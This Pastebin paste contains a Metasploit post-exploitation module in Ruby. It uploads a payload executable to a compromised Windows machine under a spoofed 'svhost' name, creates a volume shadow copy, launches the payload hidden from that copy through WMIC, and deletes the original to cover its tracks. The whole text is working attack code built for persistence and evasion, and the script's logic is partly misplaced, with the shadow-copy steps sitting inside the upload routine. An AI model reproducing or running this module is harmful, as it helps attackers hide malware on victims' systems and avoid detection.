Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- require 'msf/core'
- require 'rex'
- require 'msf/core/post/windows/shadowcopy'
- require 'msf/core/post/windows/priv'
- require 'msf/core/post/common'
- class Metasploit4 < Msf::Post
- include Msf::Post::Windows::Priv
- include Msf::Post::Windows::ShadowCopy
- include Msf::Post::Common
- def initialize(info={})
- super(update_info(info,
- 'Name' => "Windows Manage Create Persistant Payload in Shadow Copy",
- 'Description' => %q{
- This module will attempt to create a persistant payload
- in new volume shadow copy.This is based on the VSSOwn
- Script originally posted by Tim Tomes and Mark Baggett.
- Works on win2k3 and later.
- },
- 'License' => MSF_LICENSE,
- 'Platform' => ['win'],
- 'SessionTypes' => ['meterpreter'],
- 'Author' => ['MrXors'],
- 'References' => [[ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ]]
- ))
- register_options(
- [
- OptString.new('VOLUME', [ true, 'Volume to make a copy of.', 'C:\\']),
- OptString.new('PATH', [ true, 'Path to exe on local system.'])
- ], self.class)
- end
- def upload(session,file,trgloc = "")
- if not ::File.exists?(file)
- raise "File to Upload does not exists!"
- else
- if trgloc == ""
- location = session.fs.file.expand_path("%TEMP%")
- else
- location = trgloc
- end
- begin
- ext = file[file.rindex(".") .. -1]
- if ext and ext.downcase == ".exe"
- file_name = "svhost#{rand(100)}.exe"
- fileontrgt = "#{location}\\#{file_name}"
- else
- fileontrgt = "#{location}\\TMP#{rand(100)}#{ext}"
- end
- print_status("\tUploading #{file}....")
- session.fs.file.upload_file("#{fileontrgt}","#{file}")
- print_status("\t#{file} uploaded!")
- print_status("\tUploaded as #{fileontrgt}")
- rescue ::Exception => e
- print_status("Error uploading file #{file}: #{e.class} #{e}")
- raise e
- end
- end
- #Create Vss Shadow Copy
- unless is_admin?
- print_error("This module requires admin privs to run")
- return
- end
- if is_uac_enabled?
- print_error("This module requires UAC to be bypassed first")
- return
- end
- unless start_vss
- return
- end
- id = create_shadowcopy(datastore['VOLUME'])
- if id
- print_good "Shadow Copy #{id} created!"
- end
- digits = 0..30
- digits.each do |digit|
- run_malware = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{digit}\\#{file_name}", nil, {'Hidden' => true})
- end
- print_good("Deleting Maleware #{location}\\#{file_name}!")
- juice = session.sys.process.execute("cmd.exe /c del C:\\#{file_name}", nil, {'Hidden' => true})
- juice.close
- return fileontrgt
- end
- def run
- print_status("Uploading Payload to machine.")
- upload(session,"#{datastore['PATH']}","C:\\")
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement